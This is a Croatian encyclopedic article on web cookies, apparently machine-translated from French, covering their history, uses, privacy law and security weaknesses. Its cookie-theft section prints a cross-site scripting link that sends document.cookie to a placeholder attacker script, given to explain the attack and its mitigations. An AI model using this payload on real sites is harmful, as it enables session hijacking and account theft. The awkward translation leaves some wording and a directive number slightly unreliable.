Internetski kolačić: što je to? Definicija, podrijetlo, vrste i privatnost

Un kolačić ili web kolačić (ili kolačić, skraćeno kao svjedok u Quebecu) definiran je HTTP komunikacijskim protokolom kao slijed informacija koje HTTP poslužitelj šalje HTTP klijentu, a koje potonji vraća svaki put kada se pod određenim uvjetima postavi upit istom HTTP poslužitelju.

Kolačić je ekvivalent a mala tekstualna datoteka pohranjena na terminalu korisnika interneta. Postojeći već više od 20 godina, programerima web stranica omogućuju pohranu korisničkih podataka kako bi im se olakšala navigacija i omogućile određene funkcionalnosti. Kolačići su oduvijek bili više ili manje kontroverzni jer sadrže zaostale osobne podatke koje treće strane potencijalno mogu iskoristiti.

Web poslužitelj ga šalje kao HTTP zaglavlje web pregledniku koji ga vraća nepromijenjen svaki put kada pristupi poslužitelju. Kolačić se može koristiti za provjera autentičnosti, sesija (državno uzdržavanje), te za pohranjuju specifične podatke o korisniku, kao što su postavke stranice ili sadržaj elektroničke košarice za kupnju. Izraz kolačić potječe iz čarobni kolačić, dobro poznati koncept u UNIX računalstvu, koji je inspirirao ideju i naziv kolačića preglednika. Postoji nekoliko alternativa kolačićima, a svaka ima svoju upotrebu, prednosti i nedostatke.

Budući da su jednostavne tekstualne datoteke, kolačići nisu izvršni. Nisu ni spyware ni virusi, iako kolačiće s nekih stranica otkrivaju mnogi antivirusni softveri jer omogućuju praćenje korisnika kada posjećuju više stranica. 

Većina modernih preglednika omogućuje korisnicima da odlučite hoćete li prihvatiti ili odbiti kolačiće. Korisnici također mogu odaberite koliko dugo se kolačići pohranjuju. Međutim, potpuno odbacivanje kolačića neke stranice čini neupotrebljivima. Na primjer, pohranjujte košarice za kupnju ili stranice koje zahtijevaju prijavu pomoću vjerodajnica (korisničko ime i lozinka).

povijesni

Izraz kolačić potječe od engleskog izraza čarobni kolačić, što je paket podataka koje program prima i vraća nepromijenjene. Kolačići su se već koristili u IT-u kada Lou Montulli imao ideju koristiti ih u web komunikacijama u lipnju 1994. U to je vrijeme bio zaposlen u tvrtki Netscape Communications koja je za klijenta razvila aplikaciju za e-trgovinu. Kolačići su dali rješenje za problem pouzdanosti implementacije virtualne košarice u trgovini.

John Giannandrea i Lou Montulli napisali su Netscapeovu prvu specifikaciju kolačića iste godine. Verzija 0.9 beta Mosaic Netscapea, objavljena 13. listopada 1994., integrirana tehnologija kolačića (vidi post). Prva (neeksperimentalna) upotreba kolačića bila je da se utvrdi jesu li posjetitelji web stranice Netscape već posjetili tu stranicu. Montulli je 1995. godine podnio patentnu prijavu za tehnologiju kolačića i američki patent 5774670 je odobren. dodijeljena 1998.

Nakon implementacije u Netscape 0.9 beta 1994., kolačići su integrirani u Internet Explorer 2, objavljen u listopadu 1995.

Uvođenje kolačića još uvijek nije široj javnosti poznato. Konkretno, kolačići su prema zadanim postavkama prihvaćani u postavkama preglednika, a korisnici nisu bili obaviješteni o njihovoj prisutnosti. Neki su ljudi bili svjesni postojanja kolačića oko prvog tromjesečja 1995., ali šira javnost je saznala za njihovo postojanje tek nakon što je Financial Times objavio članak 12. veljače 1996. Iste godine kolačići su dobili veliku medijsku pozornost zbog mogućih zadiranja u privatnost. O kolačićima se raspravljalo na dvije konzultacije Američke savezne trgovinske komisije 1996. i 1997. godine.

Razvoj službene specifikacije kolačića već je bio u tijeku. Prve rasprave o službenoj specifikaciji održane su u travnju 1995. na www-talk mailing listi. Formirana je posebna IETF radna skupina. Dva alternativna prijedloga za uvođenje stanja u HTTP transakcije predložili su Brian Behlendorf i David Kristol, no grupa, koju je vodio sam Kristol, odlučila je koristiti Netscapeovu specifikaciju kao početnu točku. U veljači 1996. radna skupina je utvrdila da su kolačići trećih strana značajna prijetnja privatnosti. Specifikacija koju je izradila grupa na kraju je objavljena kao RFC 2109.

Od kraja 2014. vidimo natpis o kolačićima na mnogim stranicama. Postoji najmanje jedno proširenje preglednika koje omogućuje banner nije prikazan.

Vrste kolačića i upotrebe

Upravljanje sesijom

Kolačići se mogu koristiti za održavanje korisničkih podataka tijekom navigacije, ali i tijekom višestrukih posjeta. Kolačići su uvedeni kako bi omogućili način implementacije elektroničkih košarica za kupnju, virtualnog uređaja u kojem korisnik može akumulirati artikle koje želi kupiti dok pregledava stranicu.

Ovih dana aplikacije poput košarica umjesto toga pohranjuju popis stavki u bazu podataka na poslužitelju, što je poželjno; nego ih spremiti u sam kolačić. Web poslužitelj šalje kolačić koji sadrži jedinstveni ID sesije. Web-preglednik zatim vraća ovaj ID sesije na svaki sljedeći zahtjev, a stavke u košarici spremaju se i povezuju s tim istim jedinstvenim ID-om sesije.

Česta upotreba kolačića korisna je za prijavu na web mjesto pomoću vjerodajnica. Ukratko, web poslužitelj prvo šalje kolačić koji sadrži jedinstveni ID sesije. Zatim korisnici daju svoje vjerodajnice (obično korisničko ime i lozinku). Web aplikacija zatim autentificira sesiju i dopušta korisniku pristup usluzi.

personalizacija

Kolačići se mogu koristiti za pamćenje informacija o korisniku stranice, kako bi mu se u budućnosti prikazao odgovarajući sadržaj. Na primjer, web poslužitelj može poslati kolačić koji sadrži posljednje korisničko ime korišteno za prijavu na tu web stranicu, tako da se korisničko ime može unaprijed popuniti prilikom budućih posjeta.

Mnoge web stranice koriste kolačiće za personalizaciju na temelju korisničkih preferencija. Korisnici odabiru svoje postavke u obrascu i šalju ih na poslužitelj. Poslužitelj kodira postavke u kolačić i šalje ih natrag pregledniku. Naknadno, svaki put kada korisnik pristupi stranici ove stranice, preglednik vraća kolačić, a time i popis postavki; poslužitelj tada može prilagoditi stranicu prema korisničkim preferencijama. Na primjer, web stranica Wikipedije dopušta svojim korisnicima da odaberu izgled stranice koju preferiraju. Google tražilica svojim korisnicima (čak i ako nisu registrirani) omogućuje odabir broja rezultata koje žele vidjeti na svakoj stranici s rezultatima.

Praćenje

Kolačići za praćenje koriste se za praćenje navika korisnika interneta prilikom pregledavanja. To se djelomično može učiniti i korištenjem IP adrese računala koje postavlja zahtjev za stranicu ili korištenjem 'referrer' HTTP zaglavlja koje klijent šalje uz svaki zahtjev, ali kolačići omogućuju veću preciznost. To se može učiniti kao u sljedećem primjeru:

1. Ako korisnik pozove stranicu na stranici, a zahtjev ne sadrži kolačić, poslužitelj pretpostavlja da je to prva stranica koju je korisnik posjetio. Poslužitelj tada stvara nasumični niz i šalje ga pregledniku zajedno sa traženom stranicom.
2. Od tog trenutka, kolačić će automatski slati preglednik svaki put kada se pozove nova stranica stranice. Poslužitelj će poslati stranicu kao i obično, ali će također zabilježiti URL pozvane stranice, datum, vrijeme zahtjeva i kolačić u datoteku dnevnika.

Gledajući log datoteku, tada je moguće vidjeti koje je stranice korisnik posjetio i kojim redoslijedom. Na primjer, ako datoteka sadrži nekoliko zahtjeva napravljenih pomoću kolačića id=abc, to može utvrditi da svi ti zahtjevi dolaze od istog korisnika. Zatraženi URL, datum i vrijeme povezani sa zahtjevima omogućuju praćenje korisnikovog pregledavanja.

Kolačići i web-pratilice trećih strana, objašnjeni u nastavku, dodatno omogućuju praćenje na različitim stranicama. Praćenje jedne stranice općenito se koristi u statističke svrhe. Suprotno tome, oglašivačke tvrtke općenito koriste praćenje na različitim web-lokacijama pomoću kolačića trećih strana za izradu anonimnih korisničkih profila (koji se zatim koriste za određivanje koje reklame trebaju biti prikazane korisniku kao i za slanje e-pošte koja odgovara tim reklamama — SPAM ).

Kolačići za praćenje predstavljaju opasnost od narušavanja privatnosti korisnika, ali se mogu jednostavno izbrisati. Većina modernih preglednika uključuje opciju automatskog brisanja trajnih kolačića prilikom zatvaranja aplikacije.

Kolačići treće strane

Slike i drugi objekti sadržani na web-stranici mogu se nalaziti na poslužiteljima koji nisu poslužitelji na kojima se nalazi stranica. Za prikaz stranice, preglednik preuzima sve te objekte. Većina web stranica sadrži informacije iz različitih izvora. Na primjer, ako upišete www.example.com u svoj preglednik, često će se na dijelu stranice nalaziti objekti ili oglasi koji dolaze iz različitih izvora, tj. s druge domene od www. .example.com. Kolačići "prve" strane su kolačići koje postavlja domena navedena u adresnoj traci preglednika. Kolačiće treće strane postavlja jedan od objekata stranice koji dolazi s druge domene.

Prema zadanim postavkama preglednici kao što su Mozilla Firefox, Microsoft Internet Explorer i Opera prihvaćaju kolačiće trećih strana, ali korisnici mogu promijeniti postavke u opcijama preglednika kako bi ih blokirali. Nema sigurnosnog rizika svojstvenog kolačićima trećih strana koji omogućuju web funkcionalnost, no oni se također koriste za praćenje korisnika. od mjesta do mjesta.

Alati kao što je Ghostery dostupni za sve preglednike uključujući Google Chrome mogu blokirati razmjenu između trećih strana.

Provedba

Kolačići su mali dijelovi podataka koje web poslužitelj šalje pregledniku. Preglednik ih nepromijenjene vraća poslužitelju, uvodeći stanje (sjećanje na prošle događaje) u inače HTTP transakciju bez stanja. Bez kolačića, svako pronalaženje web stranice ili komponente web stranice je izolirani događaj, neovisan o drugim zahtjevima upućenim istoj stranici. Osim što ih web poslužitelj može postaviti, kolačiće također mogu postaviti skriptni jezici kao što je JavaScript, ako ih preglednik podržava i autorizira.

Službena specifikacija kolačića sugerira da bi preglednici trebali moći spremiti i ponovno poslati minimalni broj kolačića. Točnije, preglednik bi trebao moći pohraniti najmanje 300 kolačića od po četiri kilobajta i najmanje 20 kolačića za jedan poslužitelj ili domenu.

Prema odjeljku 3.1 RFC 2965, nazivi kolačića ne razlikuju velika i mala slova.

Kolačić može odrediti datum isteka, u kojem će slučaju kolačić biti izbrisan na taj datum. Ako kolačić ne navodi datum isteka, kolačić se briše čim korisnik napusti svoj preglednik. Stoga je određivanje datuma isteka način da kolačić preživi kroz više sesija. Iz tog razloga se kaže da su kolačići s rokom trajanja uporan. Primjer primjene: maloprodajno mjesto može koristiti trajne kolačiće za bilježenje artikala koje su korisnici stavili u svoju košaricu za kupnju (u stvarnosti se kolačić može odnositi na unos spremljen u bazi podataka na prodajnom mjestu, a ne na vašem računalu) . Na ovaj način, ako korisnici napuste svoj preglednik bez kupnje i vrate mu se kasnije, moći će ponovno pronaći artikle u košarici. Ako ti kolačići ne daju datum isteka, oni bi istekli kada bi se preglednik zatvorio, a podaci o sadržaju košarice bili bi izgubljeni.

Kolačići mogu biti ograničeni opsegom na određenu domenu, poddomenu ili put na poslužitelju koji ih je stvorio.

Stvaranje kolačića

Prijenos web stranica vrši se pomoću HyperText Transfer Protocol (HTTP). Ignorirajući kolačiće, preglednici pozivaju stranicu s web poslužitelja općenito šaljući im kratku tekstualnu poruku HTTP zahtjev. Na primjer, za pristup stranici www.example.org/index.html, preglednici se spajaju na poslužitelj www.example.org i šalju zahtjev koji izgleda ovako:

	GET /index.html HTTP/1.1Host: www.example.org
Navigateur	→	server

Poslužitelj odgovara slanjem tražene stranice, kojoj prethodi sličan tekst, a cijela se poziva HTTP odgovor. Ovaj paket može sadržavati retke koji nalažu pregledniku da pohranjuje kolačiće:

	HTTP/1.1 200 OKContent-type: text/htmlSet-Cookie: name=value (HTML stranica)
Navigateur	←	server

Poslužitelj šalje redak Set-Cookie samo ako poslužitelj želi da preglednik pohrani kolačić. Set-Cookie je zahtjev za preglednik da pohrani niz name=vrijednosti i vrati ga u svim budućim zahtjevima poslužitelju. Ako preglednik podržava kolačiće i kolačići su omogućeni u opcijama preglednika, kolačić će biti uključen u sve sljedeće zahtjeve upućene istom poslužitelju. Na primjer, preglednik poziva stranicu www.example.org/news.html slanjem sljedećeg zahtjeva poslužitelju www.example.org:

	GET /news.html HTTP/1.1Host: www.example.orgCookie: name=valueAccept: */*
Navigateur	→	server

Ovo je zahtjev za još jednu stranicu s istog poslužitelja, a razlikuje se od prvog gore jer sadrži string koji je poslužitelj prethodno poslao pregledniku. Zahvaljujući ovom sredstvu, poslužitelj zna da je ovaj zahtjev povezan s prethodnim. Poslužitelj odgovara slanjem pozvane stranice, ali i dodavanjem drugih kolačića na nju.

Vrijednost kolačića poslužitelj može promijeniti slanjem novog retka Set-Cookie: name=new_value kao odgovor na pozvanu stranicu. Preglednik zatim zamjenjuje staru vrijednost novom.

Liniju Set-Cookie obično stvara CGI program ili drugi skriptni jezik, a ne HTTP poslužitelj. HTTP poslužitelj (primjer: Apache) prenijet će pregledniku samo rezultat programa (dokument kojemu prethodi zaglavlje koje sadrži kolačiće).

Kolačiće također može postaviti JavaScript ili drugi slični jezici koji se izvode u pregledniku, tj. na strani klijenta, a ne na strani poslužitelja. U JavaScriptu se u tu svrhu koristi objekt document.cookie. Na primjer, izjava document.cookie = "temperature=20" stvara kolačić pod nazivom "temperature" i s vrijednošću 20.

Atributi kolačića

Osim para ime/vrijednost, kolačić također može sadržavati datum isteka, put, naziv domene i vrstu namjeravane veze, tj. normalnu ili šifriranu. RFC 2965 također definira da kolačići moraju imati obvezni broj verzije, ali to se općenito izostavlja. Ovi dijelovi podataka slijede par ime=nova_vrijednost i odvojeni su točkom-zarezom. Na primjer, kolačić može stvoriti poslužitelj slanjem reda Set-Cookie: name=new_value; ističe=datum; put=/; domena=.example.org.

Istek kolačića

Kolačići ističu i tada ih preglednik ne šalje poslužitelju u sljedećim situacijama:

• Kada je preglednik zatvoren, ako kolačić nije postojan.
• Kada istekne rok trajanja kolačića.
• Kada se datum isteka kolačića promijeni (od strane poslužitelja ili skripte) na datum u prošlosti.
• Kada preglednik briše kolačić na zahtjev korisnika.

Treća situacija omogućuje poslužiteljima ili skriptama eksplicitno brisanje kolačića. Imajte na umu da je s web preglednikom Google Chrome moguće saznati datum isteka pojedinog kolačića pristupom postavkama sadržaja. Kolačić spremljen na računalu može ondje ostati nekoliko desetljeća ako se ne poduzme postupak za njegovo brisanje.

Stereotipi

Od njihovog predstavljanja na Internetu, mnoge ideje o kolačićima kružile su Internetom i medijima. Godine 1998. CIAC, tim za praćenje računalnih incidenata Ministarstva energetike Sjedinjenih Država, utvrdio je da su sigurnosne ranjivosti kolačića "u suštini nepostojeće" i objasnio da "informacije o podrijetlu vaših posjeta i pojedinosti o web stranicama koje ste posjetili već postoje u datotekama dnevnika web poslužitelja”. Godine 2005. Jupiter Research objavio je rezultate studije u kojoj je značajan postotak ispitanika razmatrao sljedeće izjave:

• Kolačići su poput virus, zaraze tvrde diskove korisnika.
• Kolačići generiraju pop-up.
• Kolačići se koriste za slanje spam.
• Kolačići se koriste samo za oglašavanje.

Kolačići ne mogu brisati niti čitati podatke s računala korisnika. Međutim, kolačići omogućuju otkrivanje web stranica koje je korisnik posjetio na određenoj stranici ili skupu stranica. Ti se podaci mogu prikupljati u korisničkom profilu koji se može koristiti ili preprodavati trećim stranama, što može predstavljati ozbiljne probleme s privatnošću. Neki profili su anonimni, u smislu da ne sadrže osobne podatke, ali čak i takvi profili mogu biti upitni.

Prema istoj studiji, velik postotak korisnika interneta ne zna obrisati kolačiće. Jedan od razloga zašto ljudi ne vjeruju kolačićima jest to što su neke stranice zloupotrijebile aspekt kolačića koji identificira osobu i podijelile te informacije s drugim izvorima. Veliki postotak ciljanog oglašavanja i neželjene e-pošte, koja se smatra spamom, dolazi od informacija prikupljenih iz kolačića za praćenje.

Postavke preglednika

Većina preglednika podržava kolačiće i dopušta korisniku da ih onemogući. Najčešće opcije su:

• Omogućite ili potpuno onemogućite kolačiće, tako da se stalno prihvaćaju ili blokiraju.
• Omogućite korisniku da vidi aktivne kolačiće na određenoj stranici unosom javascript: alert(document.cookie) u adresnu traku preglednika. Neki preglednici sadrže upravitelja kolačićima za korisnika koji može pregledavati i selektivno brisati kolačiće koje preglednik trenutno pohranjuje.

Većina preglednika također dopušta potpuno brisanje osobnih podataka koji uključuju kolačiće. Postoje i dodatni moduli za kontrolu dozvola za kolačiće.

Privatnost i kolačići treće strane

U ovom fiktivnom primjeru, tvrtka za oglašavanje postavila je bannere na dvije web stranice. Postavljanjem bannera na svoje poslužitelje i korištenjem kolačića trećih strana, oglašivačka tvrtka može pratiti navigaciju korisnika kroz ova dva mjesta.

Kolačići imaju važne implikacije na privatnost i anonimnost web korisnika. Iako se kolačići šalju samo natrag na poslužitelj koji ih je postavio ili na poslužitelj koji pripada istoj internetskoj domeni, web stranica može sadržavati slike ili druge komponente pohranjene na poslužiteljima koji pripadaju drugim domenama. Pozivaju se kolačići koji se postavljaju tijekom oporavka ovih vanjskih komponenti kolačići trećih strana. To uključuje kolačiće iz neželjenih skočnih prozora.

Oglašavačke tvrtke koriste kolačiće trećih strana za praćenje korisnika na različitim stranicama koje posjećuju. Konkretno, tvrtka za oglašavanje može pratiti korisnika na svim stranicama na koje je postavila reklamne slike ili piksel za praćenje. Poznavanje stranica koje posjećuje korisnik omogućuje tvrtki za oglašavanje ciljanje oglašivačkih preferencija korisnika.

Mogućnost izrade korisničkog profila neki smatraju narušavanjem privatnosti, osobito kada se praćenje vrši na različitim domenama pomoću kolačića treće strane. Iz tog razloga neke zemlje imaju zakon o kolačićima.

Vlada Sjedinjenih Američkih Država uvela je stroga pravila o postavljanju kolačića 2000. godine, nakon što je otkriveno da Ured Bijele kuće za politiku droga koristi kolačiće za praćenje računala korisnika koji gledaju online reklame za lijekove. Godine 2002., aktivist za privatnost Daniel Brandt otkrio je da je CIA ostavila trajne kolačiće na računalima koja su posjetila njezine web stranice. Nakon što je obaviještena o ovom kršenju, CIA je izjavila da ti kolačići nisu namjerno poslani i prestala ih postavljati. 25. prosinca 2005. Brandt je otkrio da je Agencija za nacionalnu sigurnost (NSA) ostavila dva trajna kolačića na računalima posjetitelja zbog ažuriranja softvera. Nakon obavijesti, NSA je odmah onemogućila kolačiće.

U Ujedinjenom Kraljevstvu, Zakon o kolačićima “, stupio na snagu 25. svibnja 2012., obvezuje stranice na očitovanje o svojim namjerama, čime se korisnicima omogućuje da izaberu žele li ostaviti ili ne tragove svog prolaska na Internetu. Tako se mogu zaštititi od ciljanja oglašavanja. Međutim, prema Čuvar, privola korisnika interneta nije nužno izričita; unesene su izmjene u uvjete privole korisnika, čime je ovako implicirano.

Direktiva 2002/58 o privatnosti

Direktiva 202/58 o privatnosti i elektroničkim komunikacijama sadrži pravila o korištenju kolačića. Konkretno, članak 5. stavak 3. ove direktive zahtijeva da se pohranjivanje podataka (kao što su kolačići) na korisničkom računalu može izvršiti samo ako:

• korisnik je obaviješten o tome kako se podaci koriste;
• korisniku se daje mogućnost odbijanja ove operacije pohrane. Međutim, ovaj članak također navodi da je pohrana podataka iz tehničkih razloga izuzeta iz ovog zakona.

Direktiva je trebala biti primijenjena od listopada 2003., međutim, samo je vrlo nesavršeno provedena u praksi prema izvješću iz prosinca 2004., koje je također istaknulo da određene države članice (Slovačka, Latvija, Grčka, Belgija i Luksemburg) još nisu prenijele direktivu u domaće pravo.

Prema mišljenju G29 iz 2010. godine, ova direktiva, koja posebice uvjetuje korištenje kolačića u svrhu bihevioralnog oglašavanja, na izričit pristanak korisnika interneta, i dalje se vrlo slabo primjenjuje. Zapravo, većina stranica to čini na način koji nije u skladu s direktivom, ograničavajući se na jednostavan "banner" koji informira o upotrebi "kolačića" bez davanja informacija o upotrebi, bez razlikovanja "tehničkih" kolačića. „praćenje“ kolačića, niti ponuditi pravi izbor korisniku koji želi održavati tehničke kolačiće (kao što su kolačići za upravljanje košaricom) i odbiti „praćenje“ kolačića. Zapravo, mnoge stranice ne rade ispravno ako se kolačići odbiju, što nije u skladu s direktivom 2002/58 ili direktivom 95/46 (Zaštita osobnih podataka).

Direktiva 2009 / 136 / CE

Ovaj je materijal ažuriran Direktivom 2009/136/EC od 25. studenog 2009. koja navodi da je "pohranjivanje informacija ili dobivanje pristupa informacijama koje su već pohranjene u terminalnoj opremi pretplatnika ili korisnika dopušteno samo pod uvjetom da pretplatnik ili korisnik je dao svoj pristanak, nakon što je primio, u skladu s Direktivom 95/46/EC, jasne i potpune informacije, između ostalih o namjeni obrade”. Nova direktiva stoga pojačava obveze prije postavljanja kolačića na računalo korisnika interneta.

U preliminarnim razmatranjima direktive, europski zakonodavac ipak navodi: "Kada je tehnički moguće i učinkovito, u skladu s relevantnim odredbama Direktive 95/46/EZ, pristanak korisnika u pogledu obrade može se izraziti putem korištenje odgovarajućih postavki preglednika ili druge aplikacije”. No zapravo, niti jedan dosadašnji preglednik ne omogućuje odvajanje bitnih tehničkih kolačića od opcijskih koji bi trebali biti prepušteni izboru korisnika.

Ovu novu direktivu prenijeli su belgijski zastupnici u srpnju 2012. Studija iz 2014. pokazuje da se čak i zastupnici bore primijeniti ograničenja direktive.

P3P

P3P specifikacija uključuje mogućnost da poslužitelj navede politiku privatnosti, koja definira kakvu vrstu informacija prikuplja i za koju svrhu. Ova pravila uključuju (ali nisu ograničena na) korištenje informacija prikupljenih pomoću kolačića. Prema definicijama P3P-a, preglednik može prihvatiti ili odbiti kolačiće uspoređujući pravila privatnosti s korisničkim preferencijama ili pitajući korisnika, prikazujući izjavu o privatnosti politike privatnosti koju je objavio poslužitelj.

Mnogi preglednici, uključujući Apple Safari i Microsoft Internet Explorer verzije 6 i 7, podržavaju P3P koji omogućuje pregledniku da odredi hoće li prihvatiti pohranu kolačića treće strane. Preglednik Opera omogućuje korisnicima da odbiju kolačiće trećih strana i da kreiraju globalni i specifični sigurnosni profil za internetske domene. Mozilla Firefox verzija 2 izbacila je P3P podršku, ali ju je vratila u verziju 3.

Većina preglednika može blokirati kolačiće treće strane kako bi se povećala privatnost i smanjilo praćenje oglasa, bez negativnog utjecaja na web iskustvo korisnika. Mnoge reklamne agencije nude opciju odustati ciljanom oglašavanju, postavljanjem generičkog kolačića u preglednik koji deaktivira ovo ciljanje, ali takvo rješenje nije praktički učinkovito, kada se poštuje, jer se ovaj generički kolačić briše čim korisnik izbriše te kolačiće čime se poništava opt. vanjska odluka.

Nedostaci kolačića

Osim problema s privatnošću, kolačići imaju i neke tehničke nedostatke. Konkretno, ne identificiraju uvijek točno korisnike, mogu usporiti izvedbu stranice kada su u velikom broju, mogu se koristiti za sigurnosne napade i sukobljavaju se s reprezentativnim prijenosom stanja, arhitektonskim stilom softvera.

Neprecizna identifikacija

Ako se na računalu koristi više od jednog preglednika, u svakom od njih uvijek postoji posebna jedinica za pohranu kolačića. Kolačići stoga ne identificiraju osobu, već kombinaciju korisničkog računa, računala i web preglednika. Stoga svatko može koristiti ove račune, računala ili preglednike koji imaju mnoštvo kolačića. Slično tome, kolačići ne razlikuju više korisnika koji dijele isti korisnički račun, računalo i preglednik, kao što su "internet kafići" ili bilo koje drugo mjesto koje daje slobodan pristup računalnim resursima.

Ali u praksi se ova izjava u većini slučajeva pokazuje pogrešnom jer danas "osobno" računalo (ili pametni telefon, ili tablet, što je još gore) koristi uglavnom jedan pojedinac. To znači ciljati na određenu osobu i kroz količinu prikupljenih informacija doći do personaliziranog ciljanja čak i ako osoba nije "naime" identificirana.

Krađa kolačića

Kolačić može ukrasti drugo računalo na mreži.

Tijekom normalnog rada, kolačići se šalju natrag između poslužitelja (ili grupe poslužitelja u istoj domeni) i preglednika računala korisnika. Budući da kolačići mogu sadržavati osjetljive podatke (korisničko ime, lozinku koja se koristi za autentifikaciju itd.), njihove vrijednosti ne bi trebale biti dostupne drugim računalima. Krađa kolačića je čin presretanja kolačića od strane neovlaštene treće strane.

Kolačići se mogu ukrasti putem sniffera paketa u napadu koji se naziva otmica sesije. Promet na mreži mogu presresti i čitati računala koja nisu ona koja šalju i primaju (osobito na nešifriranom javnom Wi-Fi prostoru). Ovaj promet uključuje kolačiće poslane preko sesija korištenjem običnog HTTP protokola. Kada mrežni promet nije kriptiran, zlonamjerni korisnici tako mogu čitati komunikaciju drugih korisnika na mreži pomoću "njuškala paketa".

Taj se problem može riješiti šifriranjem veze između korisničkog računala i poslužitelja pomoću HTTPS protokola. Poslužitelj može odrediti a sigurna zastava prilikom postavljanja kolačića; preglednik će ga poslati samo preko sigurne linije, kao što je SSL veza.

Međutim, mnoge stranice, iako koriste HTTPS kriptiranu komunikaciju za provjeru autentičnosti korisnika (tj. stranice za prijavu), kasnije šalju kolačiće sesije i druge podatke kao i obično, putem nekriptiranih HTTP veza iz razloga učinkovitosti. Napadači tako mogu presresti kolačiće drugih korisnika i lažno ih predstavljati na odgovarajućim stranicama ili ih koristiti u napadima kolačićima.

Skriptiranje na stranici: kolačić koji bi se trebao razmjenjivati ​​samo između poslužitelja i klijenta šalje se trećoj strani.

Drugi način krađe kolačića je skriptiranje web stranica i navođenje samog preglednika da šalje kolačiće zlonamjernim poslužiteljima koji ih nikada ne primaju. Moderni preglednici omogućuju izvršavanje traženih dijelova koda s poslužitelja. Ako se kolačićima pristupa tijekom izvođenja, njihove se vrijednosti mogu u nekom obliku priopćiti poslužiteljima koji im ne bi trebali pristupati. Šifriranje kolačića prije slanja preko mreže ne pomaže u sprječavanju napada.

Ovu vrstu skriptiranja web-mjesta obično koriste napadači na web-mjestima koja korisnicima omogućuju objavljivanje HTML sadržaja. Integriranjem dijela kompatibilnog koda u HTML doprinos, napadač može primati kolačiće od drugih korisnika. Poznavanje ovih kolačića može se iskoristiti povezivanjem na istu stranicu pomoću ukradenih kolačića, čime se prepoznaje kao korisnik čiji su kolačići ukradeni.

Jedan od načina za sprječavanje takvih napada je korištenje oznake HttpOnly; to je opcija uvedena od verzije 6 Internet Explorera u PHP-u od verzije 5.2.0 za koju je planirano da kolačić bude nedostupan klijentu blizu skripte. Međutim, web programeri trebali bi to uzeti u obzir pri razvoju svoje web stranice kako bi bili imuni na skriptiranje na web stranici.

Još jedna korištena sigurnosna prijetnja je izmišljotina zahtjeva na stranici.

Službena tehnička specifikacija dopušta slanje kolačića samo na poslužitelje u domeni s koje potječu. Međutim, vrijednost kolačića može se poslati drugim poslužiteljima korištenjem sredstava koja nisu zaglavlja kolačića.

Konkretno, skriptnim jezicima poput JavaScripta općenito je dopušten pristup vrijednostima kolačića i sposobni su slati proizvoljne vrijednosti bilo kojem poslužitelju na Internetu. Ova mogućnost skriptiranja koristi se na web-mjestima koja korisnicima omogućuju objavljivanje HTML sadržaja koji drugi korisnici mogu vidjeti.

Na primjer, napadač koji djeluje na domeni example.com mogao bi objaviti komentar koji sadrži sljedeću vezu koja upućuje na popularan blog koji inače ne kontrolira:

<a href="#" onclick="window.location = 'http://exemple.com/stole.cgi?text=' + escape(document.cookie); return false;">Cliquez ici !</a>

Kada drugi korisnik klikne na ovu vezu, preglednik izvršava onclick atributni dio koda, tako da zamjenjuje niz document.cookie s popisom korisničkih kolačića koji su aktivni za ovu stranicu. Stoga se ovaj popis kolačića šalje poslužitelju example.com, a napadač stoga može prikupiti kolačiće ovog korisnika.

Ovu vrstu napada teško je otkriti na strani korisnika jer skripta dolazi s iste domene koja je postavila kolačić, a čini se da je operacija slanja vrijednosti autorizirana od strane te domene. Smatra se da je odgovornost administratora koji upravljaju ovom vrstom stranica postaviti ograničenja koja sprječavaju objavljivanje zlonamjernog koda.

Kolačići nisu izravno vidljivi programima na strani klijenta kao što je JavaScript ako su poslani s oznakom HttpOnly. Sa stajališta poslužitelja, jedina razlika je u tome što je u retku zaglavlja Set-Cookie dodano novo polje koje sadrži string HttpOnly:

Set-Cookie: RMID=732423sdfs73242; expires=Fri, 31-Dec-2010 23:59:59 GMT; path=/; domain=.exemple.net; HttpOnly

Kada preglednik primi takav kolačić, trebao bi ga normalno koristiti u sljedećoj HTTP razmjeni, ali bez da bude vidljiv skriptama koje se izvršavaju na strani klijenta. Oznaka HttpOnly nije dio nijedne službene tehničke specifikacije i nije implementirana u svim preglednicima. Imajte na umu da trenutačno ne postoji način da se spriječi čitanje i pisanje kolačića sesije metodom XMLHTTPRequest.

Modifikacija sadržaja: napadač šalje nevažeći kolačić na poslužitelj, koji je vjerojatno napravljen od važećeg kolačića koji je poslao poslužitelj.

Mijenjanje kolačića

Čim se kolačići trebaju pohraniti i nepromijenjeni vratiti na poslužitelj, napadač može promijeniti vrijednost kolačića prije nego što se pošalju natrag na poslužitelj. Na primjer, ako kolačić sadrži ukupnu vrijednost koju korisnik mora platiti za artikle stavljene u košaricu za kupnju trgovine, promjena te vrijednosti izlaže poslužitelj riziku da napadaču naplati manje od početne cijene. Proces izmjene vrijednosti kolačića naziva se trovanje kolačićima i može se koristiti nakon krađe kolačića kako bi napad bio uporan.

U metodi nadjačavanja kolačića, napadač iskorištava grešku preglednika kako bi poslužitelju poslao nevažeći kolačić.

Međutim, većina web stranica pohranjuje samo ID sesije — nasumično generirani jedinstveni broj koji se koristi za identifikaciju korisnika sesije — u samom kolačiću, dok su sve ostale informacije pohranjene na poslužitelju. U ovom slučaju, ovaj problem je u velikoj mjeri riješen.

Rukovanje kolačićima između web stranica

Očekuje se da svaka stranica ima vlastite kolačiće, tako da jedna stranica ne bi trebala moći mijenjati ili stvarati kolačiće povezane s drugom stranicom. Sigurnosni propust web-preglednika može dopustiti zlonamjernim stranicama da prekrše ovo pravilo. Iskorištavanje takve greške obično se naziva cross-site kuhanje. Svrha takvih napada može biti krađa ID-a sesije.

Korisnici bi trebali koristiti najnovije verzije web preglednika u kojima su te ranjivosti gotovo eliminirane.

Konfliktno stanje između klijenta i poslužitelja

Korištenje kolačića može generirati kontradikciju između stanja klijenta i stanja pohranjenog u kolačiću. Ako korisnik dobije kolačić i klikne na gumb "Natrag" preglednika, stanje preglednika općenito nije isto kao prije ovog preuzimanja. Na primjer, ako je košarica online trgovine kreirana pomoću kolačića, sadržaj košarice se ne može promijeniti kada se korisnik vrati u povijest preglednika: ako korisnik pritisne gumb za dodavanje artikla u svoju košaricu i klikne na "Povratak" ", članak ostaje u ovom. To možda i nije namjera korisnika, koji svakako želi poništiti dodavanje članka. To može dovesti do nepouzdanosti, zabune i grešaka. Stoga bi web programeri trebali biti svjesni ovog problema i primijeniti mjere za rješavanje ovakvih situacija.

Istek kolačića

